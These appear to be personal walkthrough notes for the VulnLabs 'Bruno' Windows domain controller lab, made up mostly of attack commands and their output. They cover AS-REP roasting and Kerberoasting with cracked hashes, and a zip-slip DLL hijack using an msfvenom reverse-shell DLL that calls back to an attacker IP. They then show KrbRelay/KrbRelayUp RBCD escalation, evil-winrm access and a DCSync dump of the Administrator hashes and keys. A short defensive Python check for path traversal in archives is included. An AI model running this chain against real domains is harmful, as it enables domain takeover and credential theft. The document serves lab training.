Bruno
This is not a writeup, just my notes about VulnLabs machines.
Last updated
Operating System: Microsoft Windows Server 2022 Datacenter
Chain: False
Credentials
User | Password | Obtained via | Privilege
svc_scan | Sunshine1 | Asreproast | Domain User
svc_net | Sunshine1 | Kerberoast | Domain User
✅ Valid Usernames (RID-Brute Forcing)
svc_net
svc_scan
employees
Chloe.Ball
Kayleigh.Patel
Donna.Harrison
Charles.Young
Graeme.Grant
Natalie.Anderson
Sam.Owen
Jeremy.Singh
Kieran.Day
Hugh.Young
🔑 Passwords list
Sunshine1
Nmap Scan
# Nmap 7.94SVN scan initiated Wed Apr 9 09:14:56 2025 as: nmap -sS -p- -A --open -T5 -Pn -n -oN ext_bruno_tcp_allports -vvv 10.10.86.131
21/tcp open ftp syn-ack ttl 127 Microsoft ftpd
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: bruno.vl0., Site: Default-First-Site-Name)
443/tcp open ssl/http syn-ack ttl 127 Microsoft IIS httpd 10.0
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: bruno.vl0., Site: Default-First-Site-Name)
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: bruno.vl0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: bruno.vl0., Site: Default-First-Site-Name)
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49682/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
56502/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
56527/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
56675/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Anonymous FTP login Allowed
❯ wget -m --no-passive ftp://anonymous:anonymous@10.10.86.131
❯ tree
.
└── ftp
├── app
│ ├── changelog
│ ├── SampleScanner.deps.json
│ ├── SampleScanner.dll
│ ├── SampleScanner.exe
│ ├── SampleScanner.runtimeconfig.dev.json
│ └── SampleScanner.runtimeconfig.json
├── benign
│ └── test.exe
├── malicious
└── queue
File: changelog
----------------------
Version 0.3
- integrated with dev site
- automation using svc_scan
Version 0.2
- additional functionality
Version 0.1
- initial support for EICAR string
Possible User: svc_scan
Not vulnerable to DNS Zone Transfer AXFR
Domain SID: S-1-5-21-1536375944-4286418366-3447278137
DNS domain: bruno.vl
FQDN: brunodc.bruno.vl
Server allows null session
FFUF | VHost Enumeration | subdomains-top1million-110000.txt | 0 Results
FFUF | Web Fuzzing | directory-list-2.3-medium.txt | root | 0 results
Previously Found User: svc_scan
❯ impacket-GetNPUsers bruno.vl/ -no-pass -usersfile users.txt 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
$krb5asrep$23$svc_scan@BRUNO.VL:e2237e0df0d2d6f565f2623c0c1b6a5c$c6ae17f760a235338e410f775dc165dd264623bfeddd22494b312b5d4634ea2f70bd24aef2580f56ede1d44ed117000e3ae8eed1103b65768576072b86cd47996e5f6b8ce846beb59d28092f4028c2b779313d5d65dea874a4917f9107f04724869cc6a02616a635d1e636d3570c19aa24560ce2805cff7d727a3872ea60fc6cb7f54267e5c4d2997c1356ad500871ee22326059d0e3447d075592e5e76edac3df9133641f2db8a848b0ae86f489ab8b1704765ea7e218defbe043dad4304aae263e3af6563e3f92daa3891bf66bb916f9cf3b12bf75b698dac5c7f520b267be5ca05216
❯ hashcat -m 18200 svc_scan.asreproast /usr/share/wordlists/rockyou.txt
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$krb5asrep$23$svc_scan@BRUNO.VL:e2237e0df<SNIF>5ca05216:Sunshine1
❯ impacket-GetUserSPNs bruno.vl/svc_scan:'Sunshine1' -request -outputfile kerberoast.hashes 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
--------------------- -------- -------- -------------------------- -------------------------- ----------
NET/brunodc.bruno.vl svc_net 2022-06-29 09:35:45.023707 2025-04-09 10:05:29.910962
SCAN/brunodc.bruno.vl svc_scan 2022-06-29 09:36:15.210348 2025-04-09 10:05:41.239671
❯ hashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txt
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$krb5tgs$23$*svc_scan$BRUNO.VL$bruno.vl/svc_scan*$980<SNIF>5cf107ef4e1d728c1c3773d685a6:Sunshine1
$krb5tgs$23$*svc_net$BRUNO.VL$bruno.vl/svc_net*$5e2ca<SNIF>14511aaa0310c60cbce39fb25bf8:Sunshine1
❯ nxc smb 10.10.86.131 -u 'svc_net' -p 'Sunshine1' --shares
SMB 10.10.86.131 445 BRUNODC [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
SMB 10.10.86.131 445 BRUNODC [+] bruno.vl\svc_net:Sunshine1
SMB 10.10.86.131 445 BRUNODC [*] Enumerated shares
SMB 10.10.86.131 445 BRUNODC Share Permissions Remark
SMB 10.10.86.131 445 BRUNODC ----- ----------- ------
SMB 10.10.86.131 445 BRUNODC ADMIN$ Remote Admin
SMB 10.10.86.131 445 BRUNODC C$ Default share
SMB 10.10.86.131 445 BRUNODC CertEnroll READ Active Directory Certificate Services share
SMB 10.10.86.131 445 BRUNODC IPC$ READ Remote IPC
SMB 10.10.86.131 445 BRUNODC NETLOGON READ Logon server share
SMB 10.10.86.131 445 BRUNODC queue READ,WRITE
SMB 10.10.86.131 445 BRUNODC SYSVOL READ Logon server share
During the enumeration of SampleScanner.dll, the tester discovered that when SampleScanner.exe is running, it looks for .zip files within C:\samples\queue\. If any are found, it extracts every entry to a path built directly from the entry name (no containment check) and then deletes the original .zip file.
#Code Analyzed with dnSpy
// Decompiled SampleScanner.exe entry point (dnSpy output). The using directives and a
// minimal PatternAt reconstruction are added so the excerpt compiles; the goto layout is
// dnSpy's and is kept as is so it can be compared against the binary.
using System;
using System.Collections.Generic;
using System.IO;
using System.IO.Compression;
using System.Linq;
using System.Text;

internal static class Program
{
    private static void Main(string[] args)
    {
        // EICAR test string, spelled "EYCAR" in the binary.
        string text = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EYCAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*";
        // Strings are immutable and the return value is discarded, so "EYCAR" is never
        // corrected. This is the shipped binary's behaviour and is left unchanged.
        text.Replace("EYCAR", "EICAR");
        byte[] bytes = Encoding.ASCII.GetBytes(text);
        string[] files = Directory.GetFiles("C:\\samples\\queue\\", "*", SearchOption.AllDirectories);
        int i = 0;
        while (i < files.Length)
        {
            string text2 = files[i];
            if (text2.EndsWith(".zip"))
            {
                using (ZipArchive zipArchive = ZipFile.OpenRead(text2))
                {
                    foreach (ZipArchiveEntry zipArchiveEntry in zipArchive.Entries)
                    {
                        // The entry name is combined with the queue directory without checking
                        // where the result lands, so "../app/x.dll" is written to C:\samples\app\.
                        string text3 = Path.Combine("C:\\samples\\queue\\", zipArchiveEntry.FullName);
                        zipArchiveEntry.ExtractToFile(text3);
                    }
                    File.Delete(text2);
                    goto IL_010E;
                }
                goto IL_00B8; // unreachable; artefact of how dnSpy renders the using/finally block
            }
            goto IL_00B8;
        IL_010E:
            i++;
            continue;
        IL_00B8:
            // Non-zip file: classify by the EICAR marker and move it to malicious\ or benign\.
            if (Program.PatternAt(File.ReadAllBytes(text2), bytes).Any<int>())
            {
                File.Copy(text2, text2.Replace("queue", "malicious"), true);
                File.Delete(text2);
                goto IL_010E;
            }
            File.Copy(text2, text2.Replace("queue", "benign"), true);
            File.Delete(text2);
            goto IL_010E;
        }
    }

    // Not part of the decompiled excerpt; reconstructed here as a plain substring search
    // that yields every offset at which pattern occurs in source.
    private static IEnumerable<int> PatternAt(byte[] source, byte[] pattern)
    {
        for (int i = 0; i + pattern.Length <= source.Length; i++)
        {
            int j = 0;
            while (j < pattern.Length && source[i + j] == pattern[j]) j++;
            if (j == pattern.Length) yield return i;
        }
    }
}
Additionally, the application attempts to load hostfxr.dll from its own directory. This behavior can be abused for DLL Hijacking: because the extraction above does not sanitise entry names, a zip file containing a malicious hostfxr.dll whose entry name is ../app/hostfxr.dll is written into the app directory. Upload the zip file into the queue directory. When the application runs again it extracts the archive, then loads the planted hostfxr.dll, which subsequently sends the reverse shell.
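The extraction logic above never checks where an entry name resolves, which is exactly what lets an entry named ../app/hostfxr.dll land in the application directory. The following check is an added example, not code from the VulnLabs machine or from SampleScanner: it classifies archive members against the extraction root the way a hardened scanner should, using a constructed in-memory archive that mirrors the upload described in these notes.

```python
import io
import os
import zipfile

# Added example. The decompiled SampleScanner does Path.Combine(queueDir, entry.FullName)
# and extracts without any containment check. This module classifies entries first and
# refuses the whole archive if any member would escape the root, so a tampered upload
# is flagged rather than silently neutralised.


def entry_is_safe(root: str, name: str) -> bool:
    """Return True if extracting `name` under `root` stays inside `root`."""
    # .NET on Windows accepts both separators; treat them alike.
    normalised = name.replace("\\", "/")
    # Absolute paths and drive-letter prefixes escape the root outright.
    if normalised.startswith("/") or (len(normalised) > 1 and normalised[1] == ":"):
        return False
    root_abs = os.path.abspath(root)
    target = os.path.abspath(os.path.join(root_abs, normalised))
    # commonpath is the robust containment test: a plain string-prefix check would
    # wrongly accept /samples/queue_evil/x for the root /samples/queue.
    return os.path.commonpath([root_abs, target]) == root_abs


def unsafe_entries(zip_bytes: bytes, root: str) -> list:
    """Names of archive members that would be written outside `root`."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        return [n for n in archive.namelist() if not entry_is_safe(root, n)]


def safe_extract(zip_bytes: bytes, root: str) -> list:
    """Extract only when every member is contained; otherwise refuse and return offenders.

    Python's own extractall would strip ".." components on its own, but refusing the
    archive as a whole keeps the evidence of the traversal attempt visible.
    """
    bad = unsafe_entries(zip_bytes, root)
    if bad:
        return bad
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        archive.extractall(root)
    return []


def build_sample_archive() -> bytes:
    """Constructed test archive: one benign sample plus the traversal entry from the notes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("sample.exe", b"MZ benign placeholder (constructed)")
        archive.writestr("../app/hostfxr.dll", b"MZ placeholder (constructed)")
        archive.writestr("nested/ok.bin", b"fine")
    return buf.getvalue()


if __name__ == "__main__":
    offenders = unsafe_entries(build_sample_archive(), "/samples/queue")
    print("entries escaping the queue directory:", offenders)
```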
❯ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.5.48 LPORT=1234 -f dll > hostfxr.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes
Double-checking the entry name inside the archive:
❯ unzip -l hostfxr.zip
Archive: hostfxr.zip
Length Date Time Name
--------- ---------- ----- ----
9216 2025-04-09 08:41 ../app/hostfxr.dll
--------- -------
9216 1 file
❯ smbclient '\\bruno.vl\queue' -U "svc_net%Sunshine1"
smb: \> put hostfxr.zip
putting file hostfxr.zip as \hostfxr.zip (18.2 kb/s) (average 18.2 kb/s)
LDAP signing not required and LDAPS channel binding not enforced on the Domain Controller.
nxc ldap bruno.vl -u 'svc_net' -p 'Sunshine1' -M ldap-checker
SMB 10.10.110.194 445 BRUNODC [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
LDAP 10.10.110.194 389 BRUNODC [+] bruno.vl\svc_net:Sunshine1
LDAP-CHE... 10.10.110.194 389 BRUNODC LDAP Signing NOT Enforced!
LDAP-CHE... 10.10.110.194 389 BRUNODC LDAPS Channel Binding is set to "NEVER"
Ability to add computer accounts to the domain (MachineAccountQuota is 10).
❯ nxc ldap bruno.vl -u 'svc_net' -p 'Sunshine1' -M maq
SMB 10.10.110.194 445 BRUNODC [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
LDAP 10.10.110.194 389 BRUNODC [+] bruno.vl\svc_net:Sunshine1
MAQ 10.10.110.194 389 BRUNODC [*] Getting the MachineAccountQuota
MAQ 10.10.110.194 389 BRUNODC MachineAccountQuota: 10
PS C:\Temp> ./CheckPort.exe
./CheckPort.exe
[*] Looking for available ports..
[*] SYSTEM Is allowed through port 10246
PS C:\Temp> Import-Module .\Powermad.ps1
PS C:\Temp> New-MachineAccount -MachineAccount evilcomputer -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)
PS C:\Temp> Get-ADComputer -Identity "evilcomputer" -Properties SID | Select-Object Name, SID
S-1-5-21-1536375944-4286418366-3447278137-1117
PS C:\Temp> .\KrbRelay.exe -spn ldap/brunodc.bruno.vl -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3 -rbcd S-1-5-21-1536375944-4286418366-3447278137-1117 -port 10246 -ssl -reset-password Administrator Password123!
.\KrbRelay.exe -spn ldap/brunodc.bruno.vl -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3 -rbcd S-1-5-21-1536375944-4286418366-3447278137-1117 -port 10246 -ssl -reset-password Administrator Password123!
[*] Relaying context: bruno.vl\BRUNODC$
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\Temp\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAACH5O6Z8JnFvEvV1Uw90Me0AnAAALQQ//+cDjQ9VjoEdiIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:
[*] Forcing SYSTEM authentication
[*] Using CLSID: d99e6e74-fc88-11d0-b498-00a0c90312f3
[*] apReq: 608206d506092a864886f71201020201006e8206c4308206c0a003020105a10302010ea20703050020000000a382050761820503308204ffa003020105a10a1b084252554e4f2e564ca2233021a003020102a11a30181b046c6461701b106272756e6f64632e6272756e6f2e766ca38204c5308204c1a003020112a103020105a28204b3048204af4b6beb2b9110a73221b44a8a04d1c98f81060fb09e7d7375f568ee63e437449836d128ebdecda9175441c0104bd03ac865981d47822229c0d047f865aacd03437200e55d254a0c81997cc0e6d0d5a6decbe2f676959acac7749cf387f791312665e859efa406dd1485c9e1a45430632c7b824a433cccf8009f53c9221ef1499f6c9d032758aa2ae873ccaef3d6fa6bcefd8b1bd6f017266f95e7ae28caea501accfab7fb438abf56c04cf8ea91bddb84987dcbe1c9e65bc3362dbee0c7958225f811ea6a485f2e6d3d4188586afefbc62ab521c9e340ce7c35920a42c3e954dc56ea4260b1b3091857a23c4a9d94dc2b17b4f9952f5083c133ec07a127677a283f5dc5a209aea370dc95c2fe75e152d530c3f0392297dea7a1a10372c6c6e38282fca7840f0a68b9ddc05df735f5d697c4becc2811aafe8e3aeb8a13d64c343e3688bed232bf849bb3631c2347a75c0a36ba0bed960c58e2c392a8443fbef0be1ca0a13896b7bfbca90216aef3155e83598435e83223b16946d50c68f879ded01c7765fa0e5810567bf1f77264e53384ae0e514db0b64853f635f6200b927c342dc953ac601e7aae114b2cc2f576c722d0e7dccf03313857dfc63044a6cf737469f958e0cde77defb0ebf14a51fcb611522e4dedae098a781c1955b49585633ee2c00201475cfae0da6ecdb608f5476a3ad56b9d77ad1d1cb9bf824b46ffeac89f1c9e1cb3b4672ffd28013f26edc21e89b1b99de2809a909058ed7f24836281d303555b08e36848355a02aaf4b024aae74b62b3206b2cdd188e58f3ea4666b50268f479a9a98b394e61adc797a19982b053588726a0ce05fceae2e58c93a6de844c80aa11298a17d27022e0a0d890638fc377443eb1a94098bcfc6606c230fd75c84ca8ad93721236c352398573afb7a5260cc5fcd1d83845fc438c21ff3b38381caf3bcd26755700ff8d40ee0e426ccac0edb73adfbf3839c5bdaa21d045e171338b52a3a86a254962d6236ff1dc93d4301f91558dce0136ab41d00bdf857e54718d1d4c9af14d66db01a265e9554e111254ee5acbdc1ee046a4a923f940bcb35e63d779db4251191ae9104ae48943ae374c6a05edbeea2a038ef7e5dc0f135b72a53fef2f66b4b8b9f9ff40e574dac600b7d426ccc7771ee67c7c53b514906b3894a3ea374f583d1967bf90d6c5e0ed06ca49918107e49e172
6744f54f634af60e05496544ef86b6e41a2535751a6d47ee4a2a518ca1f1654477f09fc3fec2e056b78610ca2f7985f2ef7e68891bbcaee0f6cb2220064c2c01116eb3b5ab742909bdf9428cb28d554b9b81fdbae065643f4615f2d71e28157d396b759d37929f8c6335836bb55f317f9d685da0c4798a478536594b7b81a6f88b66e4de6485431629bf2a34ef3a32977535e8f37bd25a374a1da44e949238d394aedde4d8d4efa025655df50f8ace37f0667aae8f2744670e35b5c7d765877f55d0155b205aa6220dd9565ae23a5a509f8494cd2860544f5e06daace8f8009dcfee02a7d9914a09c8c7ab8c4c76a2e10ec57c265e1370a2caf8be963a8e00379c0e2efd88c59848354ed3ec48e6ac9693753efbd30eb63ef78af5aa297839b25f316f78719c8e59259efc20a0a35e2bba5ea1d11b986b43609984792679078a76a6f5f60cc4e2c730eb7d01668d68d4e363a8ed4a482019e3082019aa003020112a28201910482018d84df0d677265e818b47d42add3b1ca523df1943f1f83d5f8f0d792ebfad1b573d1bb547bc28a4ed6a74874bec008bc7e61ba20b6935b4850ff53c8dae5bb1d05c6e2c18a16e12b23b5ef3660fddfdcba7e441188450685e5df169d4ec4ff685197871f001f3e20e713288d6b85048ee16a7b91ad68e6fa91762584ff6e997da9d12504e495c36585977e574b5c64d13f05552feceda4470f79bcc9896844375b2ce419271a908c283f220a10f01e7bb763b6c11cec313c3000e55c824cde4d6a2e0ade840d9f924f544ceadca7919606867f1aea8013d6132beffe9c6321085c0ca93bbaecfa5b655e8607e5c0cfa368c11b5ca049bab462226356b51aa986cbaff19f05648ed0c0c0cc63fadc9393989dc5d92c13f6e8e58045f5363bf1c1794e3ce577649febb16a90b927fd521b6de74e1ade9437727f44c0cc74acf74c11fe17dbf4e2adc623affd8f1bd6d7e6b1ae702b8662f5d1c9ed9e800e2c0fb25c9b83e512791861051a42c65258f76e15dedea42019ede636b28500513f6feb54bb34bb3bc47072600f10dddd25
[*] bind: 0
[*] ldap_get_option: LDAP_SASL_BIND_IN_PROGRESS
[*] apRep1: 6f8188308185a003020105a10302010fa2793077a003020112a270046e31d628dff7927d6603ec5a3a3caba593768cde4d889902613ea33be9a9402cc9232c38e1800ccc6935966ff3e01b4b04d86eb537b760f6e8841bcb32b59df79e2d3ef0ac9251eddbfdf6e862c37032e89c9995e2fc99457c09a704e107efb9f24c08adf0c881cf39c7d46eb4f2bb
[*] AcceptSecurityContext: SEC_I_CONTINUE_NEEDED
[*] fContextReq: Delegate, MutualAuth, UseDceStyle, Connection
[*] apRep2: 6f5b3059a003020105a10302010fa24d304ba003020112a24404428d489c77f6d3d090176a32eb12f9accf0a803233250cb385f37cd8cc81f603f6d5defd5b00e7bf8cf8db2b3cc6924d9f366953784b7ca208bf429060130c80c35b0b
[*] bind: 0
[*] ldap_get_option: LDAP_SUCCESS
[+] LDAP session established
[*] ldap_modify: LDAP_SUCCESS
[*] ldap_modify: LDAP_SUCCESS
PS C:\Temp>
❯ evil-winrm -i bruno.vl -u 'Administrator' -p 'Password123!'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
bruno\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents>
PS C:\Temp> .\KrbRelayUp.exe full -m rbcd -c -cls d99e6e73-fc88-11d0-b498-00a0c90312f3 -p 10246
.\KrbRelayUp.exe full -m rbcd -c -cls d99e6e73-fc88-11d0-b498-00a0c90312f3 -p 10246
KrbRelayUp - Relaying you to SYSTEM
[+] Rewriting function table
[+] Rewriting PEB
[+] Init COM server
[+] Computer account "KRBRELAYUP$" added with password "bD7/vJ7-tF7@kS1-"
[+] Register COM server
[+] Forcing SYSTEM authentication
[+] Got Krb Auth from NT/SYSTEM. Relying to LDAP now...
[+] LDAP session established
[+] RBCD rights added successfully
[+] TGT request successful!
[+] Building S4U2self
[+] Using domain controller: brunodc.bruno.vl (fe80::9d1a:7ff2:c40b:9583%6)
[+] Sending S4U2self request to fe80::9d1a:7ff2:c40b:9583%6:88
[+] S4U2self success!
[+] Got a TGS for 'Administrator' to 'KRBRELAYUP$@BRUNO.VL'
[+] Impersonating user 'Administrator' to target SPN 'HOST/BRUNODC'
[+] Building S4U2proxy request for service: 'HOST/BRUNODC'
[+] Using domain controller: brunodc.bruno.vl (fe80::9d1a:7ff2:c40b:9583%6)
[+] Sending S4U2proxy request to domain controller fe80::9d1a:7ff2:c40b:9583%6:88
[+] S4U2proxy success!
[+] Importing ticket into a sacrificial process using CreateNetOnly
[+] Process : 'C:\Temp\KrbRelayUp.exe krbscm --ServiceName "KrbSCM"' successfully created with LOGON_TYPE = 9
[+] ProcessID : 3552
[+] Ticket successfully imported!
[+] LUID : 0xec39a
[+] System service should be started in background
❯ impacket-getST -impersonate 'administrator' bruno.vl/'KRBRELAYUP$':'bD7/vJ7-tF7@kS1-' -spn HOST/brunodc.bruno.vl -dc-ip 10.10.67.195 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@HOST_brunodc.bruno.vl@BRUNO.VL.ccache
❯ KRB5CCNAME="administrator@HOST_brunodc.bruno.vl@BRUNO.VL.ccache" impacket-secretsdump -k -no-pass brunodc.bruno.vl -just-dc-user Administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:13735c7d60b417421dc6130ac3e0bfd4:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:8366d22e99c4e2f9b5c9a8bbf5b1b9ea6fd097f622048a3fdb29e95ca69d686f
Administrator:aes128-cts-hmac-sha1-96:882ed3f25c43d2e0519951e837a885d3
Administrator:des-cbc-md5:3e16a497806115b3
[*] Cleaning up...
PS C:\Temp> .\KrbRelayUp.exe full -m rbcd -c -cls d99e6e73-fc88-11d0-b498-00a0c90312f3 -p 10246
.\KrbRelayUp.exe full -m rbcd -c -cls d99e6e73-fc88-11d0-b498-00a0c90312f3 -p 10246
KrbRelayUp - Relaying you to SYSTEM
[+] Rewriting function table
[+] Rewriting PEB
[+] Init COM server
[+] Computer account "KRBRELAYUP$" added with password "bD7/vJ7-tF7@kS1-"
[+] Register COM server
[+] Forcing SYSTEM authentication
[+] Got Krb Auth from NT/SYSTEM. Relying to LDAP now...
[+] LDAP session established
[+] RBCD rights added successfully
[+] TGT request successful!
[+] Building S4U2self
[+] Using domain controller: brunodc.bruno.vl (fe80::9d1a:7ff2:c40b:9583%6)
[+] Sending S4U2self request to fe80::9d1a:7ff2:c40b:9583%6:88
[+] S4U2self success!
[+] Got a TGS for 'Administrator' to 'KRBRELAYUP$@BRUNO.VL'
[+] Impersonating user 'Administrator' to target SPN 'HOST/BRUNODC'
[+] Building S4U2proxy request for service: 'HOST/BRUNODC'
[+] Using domain controller: brunodc.bruno.vl (fe80::9d1a:7ff2:c40b:9583%6)
[+] Sending S4U2proxy request to domain controller fe80::9d1a:7ff2:c40b:9583%6:88
[+] S4U2proxy success!
[+] Importing ticket into a sacrificial process using CreateNetOnly
[+] Process : 'C:\Temp\KrbRelayUp.exe krbscm --ServiceName "KrbSCM"' successfully created with LOGON_TYPE = 9
[+] ProcessID : 3552
[+] Ticket successfully imported!
[+] LUID : 0xec39a
[+] System service should be started in background
PS C:\Temp> .\Rubeus.exe asktgt /user:'KRBRELAYUP$' /password:'bD7/vJ7-tF7@kS1-' /nowrap
.\Rubeus.exe asktgt /user:'KRBRELAYUP$' /password:'bD7/vJ7-tF7@kS1-' /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Ask TGT
[*] Using rc4_hmac hash: ACFC0492669C004A8D08561ED4EF0DA3
[*] Building AS-REQ (w/ preauth) for: 'bruno.vl\KRBRELAYUP$'
[*] Using domain controller: fe80::9d1a:7ff2:c40b:9583%6:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
ServiceName : krbtgt/bruno.vl
ServiceRealm : BRUNO.VL
UserName : KRBRELAYUP$
UserRealm : BRUNO.VL
StartTime : 4/11/2025 1:33:22 AM
EndTime : 4/11/2025 11:33:22 AM
RenewTill : 4/18/2025 1:33:22 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : D9vHq69f8QqpUmXVLvEDOw==
ASREP (key) : ACFC0492669C004A8D08561ED4EF0DA3
PS C:\Temp> .\Rubeus.exe s4u /ticket:doIFYDCCBVygAwIBBaEDAgEWooIE<>snip /impersonateuser:administrator /msdsspn:HOST/brunodc.bruno.vl /domain:bruno.vl /dc:brunodc.bruno.vl /nowrap /outfile:ticket.kirbi
I tried to perform a DCSync attack within Windows using Mimikatz, but it didn’t work, even though the tickets were valid. On Windows, UAC (User Account Control) filters admin privileges for network operations (e.g., SMB, LDAP), causing Access Denied, and Mimikatz failed because SeDebugPrivilege wasn’t enabled due to insufficient local privileges or restrictions. Additionally, tickets injected into the session via /ptt are subject to UAC and local ACLs, limiting their use. Then I decided to move to my Linux machine and perform the DCSync attack using Impacket. In Linux, it worked because Impacket uses the .ccache ticket directly against the DC, bypassing UAC and local privilege issues, and applies the ticket’s permissions cleanly over the network without session constraints.
PS C:\Temp> .\mimikatz.exe privilege::debug "lsadump::dcsync /all /path" exit
.\mimikatz.exe privilege::debug "lsadump::dcsync /all /path" exit
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061
mimikatz(commandline) # lsadump::dcsync /all /path
[DC] 'bruno.vl' will be the domain
[DC] 'brunodc.bruno.vl' will be the DC server
[DC] Exporting domain 'bruno.vl'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x00002105 (8453)
mimikatz(commandline) # exit
Bye!
PS C:\Temp>
impacket-ticketConverter "ticket_administrator_to_KRBRELAYUP$@BRUNO.VL.kirbi" administrator.ccache
impacket-ticketConverter "ticket_HOST_brunodc.bruno.vl.kirbi" host.ccache
❯ KRB5CCNAME="host.ccache" impacket-secretsdump -k -no-pass brunodc.bruno.vl -just-dc-user Administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:13735c7d60b417421dc6130ac3e0bfd4:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:8366d22e99c4e2f9b5c9a8bbf5b1b9ea6fd097f622048a3fdb29e95ca69d686f
Administrator:aes128-cts-hmac-sha1-96:882ed3f25c43d2e0519951e837a885d3
Administrator:des-cbc-md5:3e16a497806115b3
[*] Cleaning up...
- Alternative: python2.7 evilarc.py -p ../app hostfxr.dll -d 0
Tool: